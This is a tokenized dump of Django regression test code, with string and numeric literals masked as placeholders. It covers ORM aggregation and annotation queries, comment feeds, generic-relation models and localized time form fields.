'<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:7> } <EOL> ] , <EOL> lambda p : p , <EOL> ) <EOL> qs = Publisher . objects . annotate ( num_books = Count ( '<STR_LIT>' ) ) . exclude ( num_books__lt = F ( '<STR_LIT>' ) / <NUM_LIT:2> ) . order_by ( '<STR_LIT:name>' ) . values ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:3> } , <EOL> { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT:name>' : u"<STR_LIT>" , '<STR_LIT>' : <NUM_LIT:0> } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] , <EOL> lambda p : p , <EOL> ) <EOL> def test_db_col_table ( self ) : <EOL> qs = Clues . objects . values ( '<STR_LIT>' ) . annotate ( Appearances = Count ( '<STR_LIT>' ) , Distinct_Clues = Count ( '<STR_LIT>' , distinct = True ) ) <EOL> self . assertQuerysetEqual ( qs , [ ] ) <EOL> qs = Entries . objects . annotate ( clue_count = Count ( '<STR_LIT>' ) ) <EOL> self . assertQuerysetEqual ( qs , [ ] ) <EOL> def test_empty ( self ) : <EOL> self . assertEqual ( <EOL> Book . objects . filter ( id__in = [ ] ) . count ( ) , <EOL> <NUM_LIT:0> <EOL> ) <EOL> vals = Book . objects . filter ( id__in = [ ] ) . aggregate ( num_authors = Count ( '<STR_LIT>' ) , avg_authors = Avg ( '<STR_LIT>' ) , max_authors = Max ( '<STR_LIT>' ) , max_price = Max ( '<STR_LIT>' ) , max_rating = Max ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> vals , <EOL> { '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> ) <EOL> qs = Publisher . objects . filter ( pk = <NUM_LIT:5> ) . annotate ( num_authors = Count ( '<STR_LIT>' ) , avg_authors = Avg ( '<STR_LIT>' ) , max_authors = Max ( '<STR_LIT>' ) , max_price = Max ( '<STR_LIT>' ) , max_rating = Max ( '<STR_LIT>' ) ) . values ( ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : None , '<STR_LIT:name>' : u"<STR_LIT>" , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : None , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : None , '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT>' : None } <EOL> ] , <EOL> lambda p : p <EOL> ) <EOL> def test_more_more ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda b : b . name <EOL> ) <EOL> qs = Book . objects . filter ( rating__lt = <NUM_LIT> ) . select_related ( ) . annotate ( Avg ( '<STR_LIT>' ) ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> ( u'<STR_LIT>' , <NUM_LIT> , u'<STR_LIT>' , u'<STR_LIT>' ) , <EOL> ( u'<STR_LIT>' , <NUM_LIT> , u'<STR_LIT>' , u'<STR_LIT>' ) , <EOL> ( u'<STR_LIT>' , Approximate ( <NUM_LIT> , places = <NUM_LIT:2> ) , u'<STR_LIT>' , u'<STR_LIT>' ) , <EOL> ( u'<STR_LIT>' , <NUM_LIT> , u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> ] , <EOL> lambda b : ( b . name , b . authors__age__avg , b . publisher . name , b . contact . name ) <EOL> ) <EOL> qs = Book . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . values ( '<STR_LIT>' ) . annotate ( Count ( '<STR_LIT:id>' ) ) . order_by ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] , <EOL> lambda b : b <EOL> ) <EOL> qs = Book . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:foo>' : '<STR_LIT>' } ) . values ( '<STR_LIT>' ) . annotate ( Count ( '<STR_LIT:id>' ) ) . order_by ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] , <EOL> lambda b : b <EOL> ) <EOL> ids = Book . objects . filter ( pages__gt = <NUM_LIT:100> ) . annotate ( n_authors = Count ( '<STR_LIT>' ) ) . filter ( n_authors__gt = <NUM_LIT:2> ) . order_by ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> Book . objects . filter ( id__in = ids ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda b : b . name <EOL> ) <EOL> def test_duplicate_alias ( self ) : <EOL> self . assertRaises ( ValueError , Book . objects . all ( ) . annotate , Avg ( '<STR_LIT>' ) , authors__age__avg = Avg ( '<STR_LIT>' ) ) <EOL> def test_field_name_conflict ( self ) : <EOL> self . assertRaises ( ValueError , Author . objects . annotate , age = Avg ( '<STR_LIT>' ) ) <EOL> def test_m2m_name_conflict ( self ) : <EOL> self . assertRaises ( ValueError , Author . objects . annotate , friends = Count ( '<STR_LIT>' ) ) <EOL> def test_values_queryset_non_conflict ( self ) : <EOL> results = Author . objects . values ( '<STR_LIT:name>' ) . annotate ( age = Count ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) <EOL> self . assertEquals ( len ( results ) , <NUM_LIT:9> ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] , u'<STR_LIT>' ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = Author . objects . values ( '<STR_LIT:name>' ) . annotate ( age = Avg ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) <EOL> self . assertEquals ( len ( results ) , <NUM_LIT:9> ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] , u'<STR_LIT>' ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> results = Author . objects . values ( '<STR_LIT:name>' ) . annotate ( friends = Count ( '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) <EOL> self . assertEquals ( len ( results ) , <NUM_LIT:9> ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] , u'<STR_LIT>' ) <EOL> self . assertEquals ( results [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <NUM_LIT:2> ) <EOL> def test_reverse_relation_name_conflict ( self ) : <EOL> self . assertRaises ( ValueError , Author . objects . annotate , book_contact_set = Avg ( '<STR_LIT>' ) ) <EOL> def test_pickle ( self ) : <EOL> qs = Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) <EOL> pickle . dumps ( qs ) <EOL> query = qs . query . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] <EOL> qs2 = pickle . loads ( pickle . dumps ( qs ) ) <EOL> self . assertEqual ( <EOL> qs2 . query . get_compiler ( qs2 . db ) . as_sql ( ) [ <NUM_LIT:0> ] , <EOL> query , <EOL> ) <EOL> def test_more_more_more ( self ) : <EOL> books = Book . objects . all ( ) <EOL> books . aggregate ( Avg ( "<STR_LIT>" ) ) <EOL> self . assertQuerysetEqual ( <EOL> books . all ( ) , [ <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' <EOL> ] , <EOL> lambda b : b . name <EOL> ) <EOL> qs = Book . objects . annotate ( num_authors = Count ( '<STR_LIT>' ) ) . filter ( num_authors = <NUM_LIT:2> ) . dates ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> datetime . datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:15> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:6> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ] , <EOL> lambda b : b <EOL> ) <EOL> qs = Book . objects . annotate ( mean_auth_age = Avg ( '<STR_LIT>' ) ) . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } , select_params = [ <NUM_LIT:1> , <NUM_LIT:2> ] ) . order_by ( '<STR_LIT>' ) . values ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> <EOL> ] , <EOL> lambda b : int ( b [ "<STR_LIT>" ] ) <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . values ( '<STR_LIT>' ) . annotate ( Count ( '<STR_LIT>' ) ) . count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . annotate ( Count ( '<STR_LIT>' ) ) . values ( '<STR_LIT>' ) . count ( ) , <EOL> <NUM_LIT:6> <EOL> ) <EOL> publishers = Publisher . objects . filter ( id__in = [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . assertQuerysetEqual ( <EOL> publishers , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> lambda p : p . name <EOL> ) <EOL> publishers = publishers . annotate ( n_books = Count ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( <EOL> publishers [ <NUM_LIT:0> ] . n_books , <EOL> <NUM_LIT:2> <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> publishers , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda p : p . name <EOL> ) <EOL> books = Book . objects . filter ( publisher__in = publishers ) <EOL> self . assertQuerysetEqual ( <EOL> books , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda b : b . name <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> publishers , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda p : p . name <EOL> ) <EOL> self . assertEqual ( <EOL> HardbackBook . objects . aggregate ( n_pages = Sum ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> } <EOL> ) <EOL> self . assertEqual ( <EOL> HardbackBook . objects . aggregate ( n_pages = Sum ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> } , <EOL> ) <EOL> qs = HardbackBook . objects . annotate ( n_authors = Count ( '<STR_LIT>' ) ) . values ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' } <EOL> ] , <EOL> lambda h : h <EOL> ) <EOL> qs = HardbackBook . objects . annotate ( n_authors = Count ( '<STR_LIT>' ) ) . values ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:name>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : u'<STR_LIT>' } <EOL> ] , <EOL> lambda h : h , <EOL> ) <EOL> self . assertRaises ( <EOL> FieldError , <EOL> lambda : Book . objects . annotate ( mean_age = Avg ( '<STR_LIT>' ) ) . annotate ( Avg ( '<STR_LIT>' ) ) <EOL> ) <EOL> def test_empty_filter_count ( self ) : <EOL> self . assertEqual ( <EOL> Author . objects . filter ( id__in = [ ] ) . annotate ( Count ( "<STR_LIT>" ) ) . count ( ) , <EOL> <NUM_LIT:0> <EOL> ) <EOL> def test_empty_filter_aggregate ( self ) : <EOL> self . assertEqual ( <EOL> Author . objects . filter ( id__in = [ ] ) . annotate ( Count ( "<STR_LIT>" ) ) . aggregate ( Count ( "<STR_LIT>" ) ) , <EOL> { "<STR_LIT>" : None } <EOL> ) <EOL> def test_annotate_and_join ( self ) : <EOL> self . assertEqual ( <EOL> Author . objects . annotate ( c = Count ( "<STR_LIT>" ) ) . exclude ( friends__name = "<STR_LIT>" ) . count ( ) , <EOL> Author . objects . count ( ) <EOL> ) <EOL> def test_f_expression_annotation ( self ) : <EOL> qs = Book . objects . values ( "<STR_LIT:name>" ) . annotate ( <EOL> n_authors = Count ( "<STR_LIT>" ) <EOL> ) . filter ( <EOL> pages__lt = F ( "<STR_LIT>" ) * <NUM_LIT:200> <EOL> ) . values_list ( "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> Book . objects . filter ( pk__in = qs ) , [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> def test_values_annotate_values ( self ) : <EOL> qs = Book . objects . values ( "<STR_LIT:name>" ) . annotate ( <EOL> n_authors = Count ( "<STR_LIT>" ) <EOL> ) . values_list ( "<STR_LIT>" , flat = True ) <EOL> self . assertEqual ( list ( qs ) , list ( Book . objects . values_list ( "<STR_LIT>" , flat = True ) ) ) <EOL> def test_having_group_by ( self ) : <EOL> qs = Book . objects . values_list ( "<STR_LIT:name>" ) . annotate ( <EOL> n_authors = Count ( "<STR_LIT>" ) <EOL> ) . filter ( <EOL> pages__gt = F ( "<STR_LIT>" ) <EOL> ) . values_list ( "<STR_LIT:name>" , flat = True ) <EOL> self . assertEqual ( <EOL> list ( qs ) , list ( Book . objects . values_list ( "<STR_LIT:name>" , flat = True ) ) <EOL> ) <EOL> def test_annotation_disjunction ( self ) : <EOL> qs = Book . objects . annotate ( n_authors = Count ( "<STR_LIT>" ) ) . filter ( <EOL> Q ( n_authors = <NUM_LIT:2> ) | Q ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> qs = Book . objects . annotate ( n_authors = Count ( "<STR_LIT>" ) ) . filter ( <EOL> Q ( name = "<STR_LIT>" ) | ( Q ( name = "<STR_LIT>" ) & Q ( n_authors = <NUM_LIT:3> ) ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> qs = Publisher . objects . annotate ( <EOL> rating_sum = Sum ( "<STR_LIT>" ) , <EOL> book_count = Count ( "<STR_LIT>" ) <EOL> ) . filter ( <EOL> Q ( rating_sum__gt = <NUM_LIT> ) | Q ( rating_sum__isnull = True ) <EOL> ) . order_by ( '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> qs = Publisher . objects . annotate ( <EOL> rating_sum = Sum ( "<STR_LIT>" ) , <EOL> book_count = Count ( "<STR_LIT>" ) <EOL> ) . filter ( <EOL> Q ( pk__lt = F ( "<STR_LIT>" ) ) | Q ( rating_sum = None ) <EOL> ) . order_by ( "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> def test_quoting_aggregate_order_by ( self ) : <EOL> qs = Book . objects . filter ( <EOL> name = "<STR_LIT>" <EOL> ) . annotate ( <EOL> authorCount = Count ( "<STR_LIT>" ) <EOL> ) . order_by ( "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> ( "<STR_LIT>" , <NUM_LIT:3> ) , <EOL> ] , <EOL> lambda b : ( b . name , b . authorCount ) <EOL> ) <EOL> if run_stddev_tests ( ) : <EOL> def test_stddev ( self ) : <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) </s>
<s> import warnings <EOL> from django . test . utils import get_warnings_state , restore_warnings_state <EOL> from regressiontests . comment_tests . tests import CommentTestCase <EOL> class CommentFeedTests ( CommentTestCase ) : <EOL> urls = '<STR_LIT>' <EOL> feed_url = '<STR_LIT>' <EOL> def test_feed ( self ) : <EOL> response = self . client . get ( self . feed_url ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEquals ( response [ '<STR_LIT:Content-Type>' ] , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> class LegacyCommentFeedTests ( CommentFeedTests ) : <EOL> feed_url = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . _warnings_state = get_warnings_state ( ) <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> restore_warnings_state ( self . _warnings_state ) </s>
<s> from django . db import models <EOL> from django . contrib . contenttypes import generic <EOL> from django . contrib . contenttypes . models import ContentType <EOL> class Award ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> object_id = models . PositiveIntegerField ( ) <EOL> content_type = models . ForeignKey ( ContentType ) <EOL> content_object = generic . GenericForeignKey ( ) <EOL> class AwardNote ( models . Model ) : <EOL> award = models . ForeignKey ( Award ) <EOL> note = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> awards = generic . GenericRelation ( Award ) <EOL> class Book ( models . Model ) : <EOL> pagecount = models . IntegerField ( ) <EOL> class Toy ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:50> ) <EOL> class Child ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:50> ) <EOL> toys = models . ManyToManyField ( Toy , through = '<STR_LIT>' ) <EOL> class PlayedWith ( models . Model ) : <EOL> child = models . ForeignKey ( Child ) <EOL> toy = models . ForeignKey ( Toy ) <EOL> date = models . DateField ( db_column = '<STR_LIT>' ) <EOL> class PlayedWithNote ( models . Model ) : <EOL> played = models . ForeignKey ( PlayedWith ) <EOL> note = models . TextField ( ) </s>
<s> from datetime import time , date , datetime <EOL> from unittest import TestCase <EOL> from django import forms <EOL> from django . conf import settings <EOL> from django . utils . translation import activate , deactivate <EOL> class LocalizedTimeTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_TIME_INPUT_FORMATS = settings . TIME_INPUT_FORMATS <EOL> self . old_USE_L10N = settings . USE_L10N <EOL> settings . TIME_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> settings . USE_L10N = True <EOL> activate ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> settings . TIME_INPUT_FORMATS = self . old_TIME_INPUT_FORMATS <EOL> settings . USE_L10N = self . old_USE_L10N <EOL> deactivate ( ) <EOL> def test_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class CustomTimeInputFormatsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_TIME_INPUT_FORMATS = settings . TIME_INPUT_FORMATS <EOL> settings . TIME_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def tearDown ( self ) : <EOL> settings . TIME_INPUT_FORMATS = self . old_TIME_INPUT_FORMATS <EOL> def test_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) 